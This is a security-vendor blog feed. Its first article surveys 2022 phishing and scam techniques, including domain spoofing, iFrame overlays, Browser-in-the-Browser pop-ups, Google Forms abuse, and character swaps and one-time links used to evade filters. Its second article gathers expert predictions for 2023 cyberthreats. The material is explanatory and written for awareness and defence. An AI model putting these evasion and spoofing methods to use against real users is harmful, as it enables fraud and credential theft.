There are two main types of online fraud aimed at stealing user data and money: phishing and scams. Phishers primarily seek to extract confidential information from victims, such as credentials or bank card details, while scammers deploy social engineering to persuade targets to transfer money on their own accord.

The history of scams and phishing

The term “phishing” was coined back in 1996, when cybercriminals attacked users of America Online (AOL), the largest internet provider at that time. Posing as AOL employees, the scammers sent messages asking users to verify their accounts or asking for payment details. This method of phishing for personal data is still in use today, because, unfortunately, it continues to yield results.

Also in the 1990s, the first online scams appeared. When banks began to roll out internet banking, scammers sent text messages to users supposedly from relatives with an urgent request to transfer money to the details given in the message.

By the early 2000s, charity had become a common scam topic: for example, after the massive Indian Ocean earthquake and tsunami of 2004, users received messages from fake charities pleading for donations. At around the same time, phishers started targeting online payment systems and internet banks. Since user accounts in those days were protected only by a password, it was enough for attackers to phish out this information to gain access to victims’ money. To do this, they sent e-mails in the name of companies such as PayPal, asking users to go to a fake site displaying the corporate logo and enter their credentials. To make their sites look more credible, cybercriminals registered multiple domains all very similar to the original, differing by just two or three letters. An inattentive user could easily mistake a fake for a genuine bank or payment system website. In addition, scammers often used personal information from victims’ own social media pages to make their attacks more targeted, and thus more successful.

As time progressed, online fraud became ever more sophisticated and persuasive. Cybercriminals learned how to successfully mimic the official websites of brands, making them almost indistinguishable from the original, and to find new ways to approach victims. There appeared services specializing in creating fake content, at which point phishing really took off. Now not only the personal data and finances of ordinary users were in the firing line, but politicians and big business as well.

This report examines the main phishing trends, methods, and techniques that are live in 2022.

Phishing and scams: current types of fraud

Phishing:

Phishers can target credentials in absolutely any online service: banks, social networks, government portals, online stores, mail services, delivery companies, etc. But it is customers of top brands that are most often at risk, because people use and trust them more than smaller brands, increasing the likelihood of a successful attack.

To extract the coveted information, cybercriminals try to persuade victims that they are logging in on the real website of the respective company or service, or that they are sharing their credentials with a company employee. Often, fake sites look no different from the original, and even an experienced user might be fooled. Phishers skillfully copy the layout and design of official sites, adding extra details to their pages, such as live chat support (usually inactive), and linking to real services to inspire confidence.

Phishing site with chat support

Recently, alongside online phishing, vishing (voice phishing) has been on the rise. Scammers either call victims directly, or employ various tricks to get them to make the call, after which they attempt to extract their personal data and money over the phone.

Fake message about Windows-related issues in connection with which the victim must call the scammers

Also current is targeted or spear phishing, which, as the name suggests, is aimed at a specific individual or organization. Spear-phishing e-mails and sites are far more personalized than bulk ones, making them very difficult to distinguish from genuine ones.

Scams

While phishers target both businesses and ordinary internet users, scammers prey mostly on the latter. Most scams work by offering the victim an easy way to earn a chunk of money, or the chance to win a valuable prize or get something for free or at a huge discount. The main goal of this type of threat is to raise money, but scammers can also harvest the victim’s personal data to sell later or use in other schemes.

In the screenshot below, for example, the victim is informed they have won a smartphone and asked to pay a small fee to have it delivered, as well as specify their e-mail address, date of birth, gender, phone number, and home address.

Form for collecting personal data to send the bogus prize

In most cases, scammers ask for this data to convince the victim that the prize will indeed be sent, and do not store it. However, some scammers may save all the information entered on their sites for the purpose of later sending malicious e-mails supposedly from victims, using their names and addresses.

Besides promises of easy money and valuable prizes, scammers actively lure users to non-existent dating sites. For example, they might send an invitation to chat with other users, together with a link to a scam site and attractive photos. Once on the fake site, the user is told they can get premium access to the dating platform for next to nothing, but the offer expires today. They just need to sign up and pay a small fee.

Offer to activate a premium account on a fake dating site

There are other ways to attract victims to scam sites: by “selling” sought-after or scarce goods, or trips with like-minded travelers, etc. In general, if something’s popular with users, fraudsters will use it as bait.

Distribution

Although most scams and phishing attacks begin with mass e-mails containing links to fake websites, alternative attack vectors are gaining ground today. There are so many different communication and data sharing platforms that attackers can use to distribute phishing links.

Messengers

One of the main vectors for phishing and scaming are messengers such as WhatsApp and Telegram.

WhatsApp users might receive a fraudulent message from either the cybercriminals themselves or someone in their contact list. To spread their scams, attackers send messages in the name of popular brands or government agencies, but have no qualms about involving users too. In particular, to receive a gift promised in a message, they often get the victim to forward it to all or some of their contacts.

Cybercriminals get the victim to forward a link to a fake giveaway to their WhatsApp contacts

Recently, many channels have appeared on Telegram promising prizes or get-rich cryptocurrency investment schemes. The chats of popular Telegram channels are also home to scammers who, posing as ordinary users, post juicy money-making and other offers. For posting comments en masse, cybercriminals can use bots. To discover the secret of easy money, the user is invited to contact the scammers or go to their channel.

Comment in a Telegram chat promoting a currency exchange scheme

Social networks

Comments offering easy profits are also found on social networks, for example, under photos in popular accounts, where messages are more likely to be read than on a page with fewer followers. Cybercriminals invite users to follow a link in a profile header, send them a direct message, or join a secret group chat. A message can also contain a link to a phishing or scam site. Posts promising well-paid part-time work with a link to a mini app are also common on VK, the Russian equivalent of Facebook. In addition, cybercriminals can use social networks to send direct messages to users, promote their offers, or create fake accounts promising valuable gifts, in-game currency, and gift cards. These are hyped up through ads, hashtags, or mass tagging of users in posts, comments, or on photos.

Instagram account “giving away” free smartphones

Marketplaces

Marketplaces act as an intermediary between the user and the seller, to some extent ensuring the security of the transaction for both parties. But their functionality is open to abuse by scammers as well. A widespread scheme on Russian marketplaces is when the seller appears reluctant to communicate on the site and tries to move the conversation to a third-party messenger where they can send a malicious link without fear of triggering the marketplace’s built-in defenses.

Also on marketplaces, scammers often comment on other users’ reviews of products, assuring potential buyers that an item can be purchased for far less elsewhere, and attaching a link to a scam site.

Scammers distribute links to fake sites through comments on product reviews on marketplaces

Phishing and scam attack methods

To carry out attacks, cybercriminals employ a wide range of technical and psychological tricks to dupe as many users as possible while minimizing the risk of detection.

Below are the main phishing and scam techniques used in 2022.

Spoofing

To increase the victim’s trust in a fake resource, scammers often try to make it as similar as possible to the original. This technique is known as spoofing. In the context of website spoofing, there are two main types:

  • Domain spoofing, when attackers fake a website domain to fool users,
  • Content spoofing, when they mimic the appearance of a legitimate site.

It’s common for attacks to deploy both of these.

Domain spoofing involves registering a domain similar to that of the target organization. Phishers are careful to choose domains that don’t look suspicious to victims. Domain spoofing can be divided into three categories:

  • Typosquatting is the use of the original domain name with typos commonly made by users when inputting the URL, such as missing or extra characters, or letters in the wrong order.

Misspelling of the domain Instagram.com, where the number 9 appears instead of the letter “g”

  • Combosquatting is the use of additional words, often related to authorization or online security, in a domain name similar to that of the brand whose users are the target. For example, words like “login”, “secure”, “account”, “verify”, and so on.

The word “account” in a domain name alongside the name of a bank

  • Internationalized domain name (IDN) homograph attacks work by using Unicode characters that closely resemble letters in the Latin alphabet. For example, the most commonly used Cyrillic letters in such attacks are a, c, e, o, p, x, y, because they look identical to Latin a, c, e, o, p, x, y.

Content spoofing is used to fake the appearance of a legitimate site. Here, the following methods can be singled out:

  • Legal iFrame Background is when an iFrame is used to load a legitimate site onto a rogue one, on top of which a phishing form is overlaid.

Legitimate site serving as a background for a phishing form

  • HTML spoofing is the visual imitation of a legitimate site by, among other things, partially copying its style and HTML code. Scammers often use software for creating mirror sites, such as HTTrack and Website Downloader.
  • Comment in the HTML code of a phishing page indicating that HTTrack was used

    Website hacking

    Sometimes it’s easier for scammers to hack others’ sites to host malicious content than to create their own from scratch. Such phishing pages tend to be short-lived, because the site owners quickly detect and remove scam content, as well as regularly patch holes and vulnerabilities in their infrastructure. That said, if cybercriminals break into an abandoned site, phishing pages hosted there can survive a long time. Phishers can exploit compromised sites in several ways:

    • iFrame Injection is when a login form or other part of a phishing page is inserted through an iFrame. Whereas the Legal iFrame Background method involves the use of an iFrame with a legitimate website as the background for a phishing form, in the case of iFrame Injection the URL of the page is legitimate, while the iFrame contains a phishing form, whose background is most often homemade content using brand logos.

    Login form created using an iFrame on a hacked site

    • Subfolder Hijacking is the partial hacking of a site to gain access to its subdirectories to place fraudulent content there. Such attacks can either use existing directories on the legitimate site or create new ones.

    Home page of a hacked site that looks normal

    Phishing page placed in a subdirectory of a hacked site

    • Site Swapping is the complete replacement of a legitimate site with a phishing one. The original content is usually removed.

    Using legitimate services

    Some internet scammers, instead of bothering to create or hack sites, prefer to exploit the features of services trusted by users. As such, forms for creating online surveys and collecting data (Google Forms, MS Forms, HubSpot Form Builder, Typeform, Zoho Forms, etc.) are very often used to perform an attack.

    For example, in the screenshot below, scammers under the guise of technical support for a popular cryptowallet use a Google form to coax identification data out of users, such as e-mail address and secret phrase.

    Fraudsters try to finagle confidential data through Google Forms

    Although such services have started to warn users about the dangers of sharing passwords through forms, as well as to implement automatic protection (such as blocking forms containing keywords like “password”), this method remains popular with scammers due to the ability to mass-create phishing surveys. To bypass built-in security, they often use text spoofing, that is, they replace characters in keywords with visually similar ones: for example, they write pa$$w0rd instead of password, making such words unrecognizable to automated systems.

    Besides forms, cybercriminals make active use of cloud documents. Not least, they can send e-mails with a link to a document in a legitimate service that contains a phishing link.

    Avoiding detection

    Scammers use various techniques to hide from detection. Some are quite effective but not so common, because they require more advanced technical know-how than many scammers possess.

    One method to avoid detection is obfuscation, where the user-invisible source code of a scam page is scrambled to make the attack hard to detect by automated means. We talked in detail about obfuscation methods in our post about the phishing-kit market.

    Another way to protect a scam site from detection is to use methods to hide page content from automated analysis. Here are some of them:

    • Use of images. If text is replaced with images of text, content engines will be unable to see and analyze the text, so users will read it.
    • Browser notifications. Links to scam resources can be distributed through browser notifications. Unlike e-mails and public websites, browser notifications are processed in several stages, and not all anti-phishing engines analyze them. This allows cybercriminals to bypass at least some detection technologies.

    To download a song on a scam site, the user is asked to allow browser notifications from that site

    • Pop-up windows. Scam content can open in pop-up windows on a site. Pop-up windows load later than the site’s main window, so not all anti-phishing technologies see them. In addition, pop-up windows furnish attackers with additional tools to copy the appearance of a legitimate site. In particular, cybercriminals can use the Browser-in-the-Browser method, when a pop-up window imitates a browser window with an address bar showing the URL of a legitimate site.

    Browser-in-the-Browser attack: a pop-up window mimics a browser window with an address bar

    Along with content, scammers try to hide the URLs of malicious sites from detection technologies. For this purpose, they can use:

    • URL links randomly generated using hashes. Each victim receives a unique link, which makes it difficult to block a malicious site.
    • URL shorteners. Attackers can mask malicious addresses using legitimate URL shorteners, such as bit.ly.

    Social engineering elements

    Cybercriminals’ tricks often target the user and not the security system’s vulnerabilities. Scammers employ their knowledge of the human psyche to deceive victims. These can be combined with technical means to achieve a devastating effect.

    • Fake CAPTCHA. Cybercriminals mimic CAPTCHA technology on scam sites to persuade victims to perform certain actions.

    Fake CAPTCHA on a phishing page asking for permission to show browser notifications, supposedly to prove you’re not a robot

    • User-Related Dynamic Content. The page content changes depending on the user and their data, such as e-mail address: to fake the domain, images are downloaded from the user’s mail and inserted into the phishing page.

    Attackers use the victim’s mail domain to create content on a scam site

    • Intimidation and threats. Cybercriminals can intimidate victims to make them panic and act rashly. For example, they may threaten legal action and demand payment of a “fine” for the victim to be left in peace. Attackers can also threaten to block the victim’s account to force them to click a phishing link.

    Scammers threaten to seize all the user’s property and accounts if they fail to pay off a bogus debt

    • Attackers give victims a limited time window to respond to their message in one way or another to make them act rashly.

    Scam site demands urgent payment of “COVID-19-related expenses” for delivery of a parcel

    • An appeal to pity. Cybercriminals try to arouse people’s sense of pity to get them to part with their cash.
    • Lucrative offers. Scammers tempt victims with lip-smacking offers that are hard to refuse.

    Cybercriminals lure the user with the chance to win an Amazon gift card

    Conclusion

    Most users today are more or less aware of the current web threats. Many have either experienced internet scams themselves, or know about them from the news or other sources, making it harder for attackers to dupe victims and so requiring the use of ever more sophisticated methods. Instead of slapdash phishing and scam sites, high-quality fakes are becoming increasingly common. This includes mimicking a browser window with a legitimate URL in a pop-up window, as well as phishing pages with a legitimate site in the background, loaded via an iFrame. We’ve also seen elements of targeted attacks in phishing and scams, such as downloading content related to the target’s mail domain or using data got from large-scale leaks to make contact with potential victims.

    At the same time, vishing is on the rise, because it’s easier to apply pressure over the phone, giving the victim no time to mull things over. In addition, cybercriminals use other available communication channels: e-mail, popular messengers, social networks, marketplaces.

    To implement attacks, they employ a variety of techniques, such as spoofing, social engineering, site hacking, and code and content hiding. Alongside this, detection avoidance methods also continue to evolve. Attackers are increasingly using one-time generated links with hashes to prevent web threat detection technologies from blocking them.

    Note, too, that scammers continue to base their malicious campaigns on the hottest topics in the news. If there’s a major event going on somewhere, a problem on a country or global scale, or some service or technology is becoming all the rage, be sure that cybercriminals will seek to exploit it. For instance, the lockdown period was beset by large-scale “financial aid” scams, while last year’s upturn in cryptocurrency prices went hand in hand with numerous fraudulent investment schemes. So it pays to be vigilant online, especially when it comes to money: no matter how much you want to believe that good fortune has fallen from the sky, if something sounds too good to be true, it probably is.

    ]]> https://securelist.com/phishing-scam-techniques-tricks/108247/feed/ 0 full large medium thumbnail Cybersecurity threats: what awaits us in 2023? https://securelist.com/cybersecurity-threats-2023/107888/ https://securelist.com/cybersecurity-threats-2023/107888/#comments Wed, 09 Nov 2022 08:00:23 +0000 https://kasperskycontenthub.com/securelist/?p=107888

    Knowing what the future holds can help with being prepared for emerging threats better. Every year, Kaspersky experts prepare forecasts for different industries, helping them to build a strong defense against any cybersecurity threats they might face in the foreseeable future. Those predictions form Kaspersky Security Bulletin (KSB), an annual project lead by Kaspersky experts.

    As for KSB 2022, we invited notable experts to share their insights and unbiased opinions on what we should expect from cybersecurity in the following year. The contributors include representatives from government institutions: H.E. Dr.Mohamed Al Kuwaiti (UAE Cyber Security Council), and public organizations: Kubo Mačák, Tilman Rodenhäuser, Mauro Vignati (ICRC), Serge Droz (FIRST), Sven Herpig (the think tank Stiftung Neue Verantwortung). Also, we’d like to thank Prof. Dr. Dennis-Kenji Kipker (the University of Bremen; European Academy for Freedom of Information and Data Protection (EAID)), Arthur Laudrain (The Hague Centre for Strategic Studies), Stefan Soesanto (The Center for Security Studies (CSS) at ETH Zurich) for their scientific and profound contribution. Moreover, we included predictions made by our fellow commercial organizations – James Range (White Rock Security Group) and Irena Yordanova (Polycomp Ltd.).

    The opinions shared by the contributing experts do demonstrate a complexity of the modern cybersecurity industry and a strong need for collaboration among different organizations in order to combat cyberthreats that companies, individuals or even whole countries are exposed to.

    What cyberthreats for business will be the greatest in 2023?

    Vladimir Dashchenko, Security Evangelist, Kaspersky

    The ongoing geopolitical storm brings not only classical cyberthreats for business, but also unpredictable risks and ‘black swans’. The main problem for 2023 will be supply-chain stability and cybersecurity. While supply-chain is a big challenge for business right now, its cybersecurity is not merely an issue, it’s a major problem. Supply-chain will become more of a sweet spot for targeted ransomware and state-sponsored espionage campaigns.

    Another big issue is global semiconductor shortage. This will definitely play its role in corporate cybersecurity. While many companies need increasingly more computing power, (servers, workstations, network hardware and so on…) the price on the equipment continues to rise. There’s a possibility that, to cover hardware needs, some of the businesses will have to cut planned cybersecurity expenses.

    Yury Slobodyanuk, head of content filtering research, Kaspersky

    I think we will continue seeing attacks targeting the infrastructure of different countries and organizations. Phishing attacks are going to become even more sophisticated, since a lot of basic tactics have already been tried this year, and businesses learned to repel those.

    Ivan Kwiatkowski, senior security researcher, Global Research and Analysis Team, Kaspersky

    Businesses will still be mostly concerned with ransomware. The conflict between Russia and Ukraine has marked an end to any possible law enforcement cooperation in the foreseeable future. We can therefore expect that cybercrime groups from either block will feel safe to attack companies from the opposing side. Some may even perceive this as their patriotic duty. The economic downturn (caused by energy prices, inflation, sanctions, etc.) will lead more people to poverty, which always translates to increased criminality (cyber or otherwise), and we know ransomware to be extremely profitable.

    James Range, President of White Rock Security Group

    Zero trust will take on greater prominence with the continued role of the remote and hybrid workplace. Remote work will continue driving the need for zero trust since hybrid work is now the new normal. With the federal government mandating agencies to adopt zero-trust network policies and design, we expect this to become more common and the private sector to follow suit as 2023 becomes the year of verifying everything.

    Arthur Laudrain, Strategic Analyst (Cyber Program), The Hague Centre for Strategic Studies

    In 2023, we might see a slight decline in the raw number of ransomware attacks, reflecting the slowdown of the cryptocurrency markets. However, ransomware operators will keep professionalizing their operations and will target higher value organizations. At the same time, state-sponsored attacks will remain high in the threat landscape, with no ease of geopolitical tensions with Russia, China, North Korea, and Iran in sight. Businesses most at risk are aerospace and defense contractors, as well as critical infrastructure operators (utilities such as water, electricity, and Internet, but also hospitals and operators of large cyber-physical systems such as dams).

    Stefan Soesanto, Senior Cyber Defense Researcher, The Center for Security Studies (CSS) at ETH Zürich

    If I had a magic 8-ball, I would predict that the greatest cyberthreats to businesses in 2023 will be a significant increase in foreign intelligence services conducting operations under the cover of hacktivist groups, fighting big oil, climate change, fiscal policies etc. And that (b) we are also likely to see a steep increase in DDoS extortion campaigns as the Cyberwar in Ukraine leads to all-time-high levels of DDoS attacks.

    Irena Yordanova, Product Manager Software, Polycomp Ltd.

    We expect cyberthreats to rise in 2023, as unrest in the world contributes to an increase in cybercrimes. Malware attacks like ransomware will happen to businesses more frequently. And IT teams should be prepared to deal with evolving threats posed by emerging technologies which are becoming widespread, such as geo-targeted phishing or attacks related to Cloud Security, IOT and AI. Most probably more attacks on the education and healthcare sectors will occur plus targeted campaigns against industry leaders – especially those that hold critical information: sensitive data, top expertise, and latest technologies. Given that, employees should be educated and equipped to fight these mature attacks; and their companies can contribute by having experienced outside security partners to support them on this issue. End-users can prepare themselves with an easy-to-use security solution for upcoming challenges, whether it’s phishing attacks or threats related to multiple layers of security.

    What cybersecurity challenges will industries face next year?

    Vladimir Dashchenko, Security Evangelist, Kaspersky

    Threat modeling approaches will be changed in 2023. Internet ‘balkanization’, ongoing military conflicts, changes, and tensions in existing political groups of countries are influencing cyberspace and cybercrime. We will see an increasing number of cybercriminals taking political sides and breaking the law with political statements. Also, script-kiddies (low skilled hackers) will be joining groups of cybercriminals led by more skilled perpetrators, or state sponsored hackers more often.

    The major challenge for cybersecurity itself will be a lack of transparency and information sharing between companies. It will be extremely difficult to follow the ‘business as usual’ concept and remain neutral. Global political conglomerates will unfortunately influence cyberspace and cybersecurity.

    Arthur Laudrain, Strategic Analyst (Cyber Program), The Hague Centre for Strategic Studies

    Next year should see a continuation of existing trends. In particular, governments, critical infrastructure operators, and businesses with a large international footprint will face the continued challenge of ensuring the safety and integrity of their supply-chains, both in terms of software and hardware. Often, this will require closer integration with their contractors and suppliers, none the least to comply with new regulatory obligations in the U.S. and the E.U.

    James Range, President of White Rock Security Group

    Given the continued surge of ransomware attacks, which soared 288% in the first half of 2022 alone, the need for cyber insurance will be a bigger priority, especially in the SMB market. Although many industry experts argue against payouts, making cyber coverage a controversial topic, the evolving threat landscape means cyber insurance should be a top consideration as part of organizations’ cyber strategy. As such, we anticipate a booming cyber insurance industry as many organizations heed these warnings and seek to guard against ransomware attacks. Yet, in addition to cyber insurance, companies will need a designated DR or RR (Rolling Recovery) plan.

    Kubo Mačák, Legal Adviser, Tilman Rodenhäuser, Legal Adviser, Mauro Vignati, Adviser on Digital Technologies of Warfare, ICRC

    A key concern for 2023 is that civilians will be further impacted by cyber operations during armed conflict. Civilian data, devices, and networks – such as government services, critical infrastructure, or companies – risk being deliberately disrupted or damaged, often in violation of the laws of war. Civilians – individuals and companies – may get drawn into digital warfare activities, encouraged to engage in cyber operations or to support kinetic military operations through digital means. Such developments put people and societies in danger and undermine the cardinal rule that belligerents must at all times distinguish between what is military and what is civilian.

    Stefan Soesanto, Senior Cyber Defense Researcher, Center for Security Studies (CSS)

    I expect that the theft of medical data (ex. Finland’s Vastamoo in 2020 & Australia’s Medibank in 2022), as well as highly private personal data (ex. Ashley Madison in 2015) will become the major focus of ransomware groups and other cybercriminal actors alike. Underpinning this trend, the lesson learned is that imposing massive psychological pressure directly on thousands of separate victims, increases the likelihood of individual extortion payouts being made.

    What cyberthreats will pose the most danger to end-users?

    Yury Slobodyanuk, head of content filtering research, Kaspersky

    As the geopolitical situation is quite tense, different types of fraud will take advantage of new events that will take place. Also, various techniques of generating fake news using AI may be used.

    Sven Herpig, Director Cybersecurity at think tank Stiftung Neue Verantwortung

    I believe cybercrime is the biggest threat to end-users, but mainly in an indirect fashion. Cybercrime is looming over providers of essential services and goods such as municipalities, hospitals and even producers of baby food offline, rendering them less or non-operational for several days or weeks. This has a direct impact on citizens’ lives in the real world and is therefore something that I would see as one of the most prevailing threats to individuals.

    Prof. Dr. Dennis-Kenji Kipker, Professor for IT Security Law at the University of Bremen; Visiting Professor at Riga Graduate School of Law; Member of the Board of the European Academy for Freedom of Information and Data Protection (EAID)

    Remote workers in home offices continue to play a major role in everyday working daily life, along with the increased use of BYOD, which takes control of devices away from administrators. Since 2020, therefore, forms of spear phishing, social engineering and CEO fraud, as well as ransomware, become increasingly prevalent and will continue to be of considerable importance in 2023. The professionalization of cybercrime, now an independent “industry”, is contributing to a further tightening of the security situation for end users, as low-cost mass attacks are made possible in this way.

    H.E. Dr.Mohamed Al Kuwaiti, UAE Cyber Security Council

    IoT Vulnerabilities. Security issues keep plaguing IoT devices dominating the market today. As IoT combines the physical world and virtual space, home intrusions are being added to the list of the scariest possible threats that IoT brings.

    Vulnerabilities in Autonomous Vehicles. Due to the inherent risks of Autonomous Vehicles, they are increasingly vulnerable to attacks resulting in data breaches, supply chain disruptions, property damage, financial loss, and injury or loss of life.

    What are the main challenges cybersecurity will face in 2023?

    Ivan Kwiatkowski, senior security researcher, GReAT Kaspersky

    The security industry will face direct pressure resulting from the political situation. Things were complex before and they will only get worse. The biggest challenge that vendors will have to face in 2023 will be to remain neutral, if they haven’t decided to align with one block or the other already. (My opinion on this bigger matter is explained in this talk.) Generally speaking, politics and threat intelligence will become more and more entwined, and we’re very unprepared for this as a community.

    Yury Slobodyanuk, head of content filtering research, Kaspersky

    I think attacks will evolve a lot quicker next year, and a main challenge will be to still be a couple of steps ahead.

    Sven Herpig, Director Cybersecurity at think tank Stiftung Neue Verantwortung

    I don’t think that there will be anything substantially new in 2023 – one of the key challenges will still be the lack of adoption of basic security and resilience measures which cybercriminals will successfully exploit.

    Prof. Dr. Dennis-Kenji Kipker, Professor for IT Security Law at the University of Bremen; Visiting Professor at Riga Graduate School of Law; Member of the Board of the European Academy for Freedom of Information and Data Protection (EAID)

    Cybersecurity requires not only secure software, but also sufficiently trustworthy hardware. For too long, we have relied on globalization in IT security and placed too little emphasis on protecting the digital supply chain. In Germany, this was made clear by the debate about protecting sensitive 5G networks; in the geostrategic conflict between the People’s Republic of China and Taiwan, we are now seeing that we are already in the midst of a semiconductor crisis that threatens the security of supply with trustworthy IT. Here, it can be assumed that significant cybersecurity challenges will continue to rise in 2023 as political tensions grow.

    Serge Droz, Technical Advisor, Member of the Board, FIRST

    Cybercrime will continue to focus on optimizing gains per investment, meaning that smaller and/or less mature organizations will be targeted even more. These may be SMEs or businesses in sectors that don’t include IT in their core business, in particular health services. The problem with this target group is that they either have very different priorities (a ransomed hospital simply cannot afford to delay recovery, and thus pays) and don’t have the resources to defend themselves, or they just don’t have the expertise. This is what Wendy Nater calls “living below the security poverty line”. And this will be the challenge to our industry: how can we provide effective protection that works and is affordable to these types of organizations. Or in other words, can we provide security services to people other than for security specialists? My guess would be that reaching this goal requires different industries working together, in particular I feel the role of insurance needs to be clarified and aligned.

    James Range, President of White Rock Security Group

    Cyber teams are going to be in the spotlight now more than ever. Understanding your security posture is crucial; knowing what current tools are available and the gaps that currently exist in your infrastructure will help you to protect your enterprise. The need for bigger cyber budgets and having the right people in place is critical. With ongoing talent shortages, consider partnering with a third-party firm to ensure you have fail-proof processes, documentation, and regular third-party assessments.

    H.E. Dr.Mohamed Al Kuwaiti, UAE Cyber Security Council

    DDOS Botnets. One of the most recent severe attacks around the end of June 2021, was made using malware called the Mēris botnet which has climbed to the record. Due to the new nature of the malware as it has been described as a “new assaulting force on the Internet – a botnet of a new kind” and its impact is more likely to be that similar real-time emerging malware-related DDoS attacks like this one will be used in 2023.

    Ransomware as a service (RaaS). Unlike other forms of malware, this new service provides “a sort of criminal Content Distribution Network (CDN) similar, in principle, to those used by major internet portals but used exclusively for malware”. Nearly half of breaches during the first six months of 2022 involved stolen credentials, Switzerland-based cybersecurity company Acronis reported in its Mid-Year Cyberthreat Report, published on August 24, 2022. This has probably been the most discussed attack in 2022 as it’s the first time a country declared a national emergency in response to a cyber-attack. Ransomware-based malware had been quite active in 2022.

    Deep fake enabled business compromise. Deepfake-enabled compromise is a type of attack where threat actors leverage synthetic content. This includes video or audio altered or created using artificial intelligence and machine learning to impersonate C-suite executives and trick employees into transferring large sums of cash.

    ]]>
    https://securelist.com/cybersecurity-threats-2023/107888/feed/ 2 full large medium thumbnail